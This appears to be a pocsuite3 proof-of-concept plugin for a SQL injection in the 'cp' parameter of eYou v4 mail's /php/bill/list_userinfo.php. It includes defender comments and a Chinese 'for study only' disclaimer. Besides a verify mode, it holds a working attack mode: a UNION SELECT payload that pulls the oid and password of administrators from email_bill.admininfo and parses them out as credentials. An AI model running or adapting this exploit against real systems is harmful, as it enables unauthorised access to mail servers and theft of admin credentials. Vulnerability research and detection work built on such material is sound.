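"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import quote
import re

# Value the verify check looks for in the response body. The verify request
# asks the database for md5(0x6661746530); that hex literal decodes to the
# ASCII bytes "fate0". NOTE(review): presumably this is the MD5 of that
# literal -- confirm before relying on it as a signature.
_VERIFY_MARKER = '84bcd38c5ee4daa720af041484ea017c'

# Pattern for the "---<field>::<field>---" wrapper that the attack query puts
# around the selected columns. Written as a raw string: the original non-raw
# literal relied on the invalid escape "\:", which newer Python versions warn
# about. The compiled pattern is unchanged.
_ADMIN_ROW_RE = re.compile(r'---(.*)\:\:(.*)---')


class DemoPOC(POCBase):
    # pocsuite3 plugin for the SQL injection in the `cp` parameter of
    # eYou v4 /php/bill/list_userinfo.php (see `references` and `desc`).
    #
    # Defender notes:
    #   * Both modes send a GET to /php/bill/list_userinfo.php whose `cp`
    #     value carries a URL-encoded "union select"; that string in the
    #     query string of this path is the signature to search for in web
    #     server or WAF logs.
    #   * `desc` attributes the flaw to `cp` reaching SQL unfiltered, so the
    #     fix belongs server-side: validate `cp` strictly and bind it as a
    #     query parameter instead of concatenating it.
    vulID = '1266'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-04-22'
    createDate = '2014-05-04'
    updateDate = '2014-05-04'
    references = ['http://wooyun.org/bugs/wooyun-2014-058014']
    name = 'eYou v4 /php/bill/list_userinfo.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.eyou.net'
    appName = 'eYou'
    appVersion = 'V4#'
    vulType = 'SQL Injection'
    desc = '''
        php/bill/list_userinfo.php 中 cp 参数未经过有效过滤,导致SQL 注入漏洞的发生。可以获取整个邮箱的权限。
    '''
    samples = []
    install_requires = ['']

    def _get_with_cp_suffix(self, sql_suffix):
        # Send one GET with `sql_suffix` (URL-quoted) appended to the cp
        # parameter and return (requested URL, response text). Shared by
        # _verify and _attack so both hit exactly the same endpoint.
        vul_url = '%s/php/bill/list_userinfo.php?domain=foobar.org&ok=1&cp=1%%20' % self.url
        full_url = vul_url + quote(sql_suffix)
        # NOTE(review): the fixed Cookie header is presumably needed for the
        # script to reach the vulnerable query -- confirm against the target.
        headers = {'Cookie': 'cookie=admin'}
        r = requests.get(full_url, headers=headers)
        return full_url, r.text

    def _verify(self):
        """Check whether the target reflects the result of an injected query.

        The injected UNION selects only the hash of a constant, so this mode
        reads no table data. The target is reported as vulnerable when
        `_VERIFY_MARKER` appears in the response body.

        Returns:
            The `Output` object built by `parse_output`.
        """
        result = {}
        full_url, response = self._get_with_cp_suffix(
            'union select md5(0x6661746530),2,3,4,5#')
        if _VERIFY_MARKER in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = full_url
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap `result` in a pocsuite3 `Output`.

        A non-empty dict is reported as success; an empty one as
        'target is not vulnerable'.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Read one row from email_bill.admininfo through the injection.

        The first "---<oid>::<password>---" match in the response is stored
        under `AdminInfo`. The result therefore holds credential material;
        handle scan output and logs accordingly.

        Returns:
            The `Output` object built by `parse_output`.
        """
        result = {}
        _, response = self._get_with_cp_suffix(
            'union select concat(0x2d2d2d,oid,0x3a3a,password,0x2d2d2d),'
            'NULL,NULL,NULL,NULL from email_bill.admininfo#')
        data = _ADMIN_ROW_RE.findall(response)
        if data:
            result["AdminInfo"] = {}
            result['AdminInfo']["Username"] = data[0][0]
            result['AdminInfo']['Password'] = data[0][1]
        return self.parse_output(result)


register_poc(DemoPOC)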
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负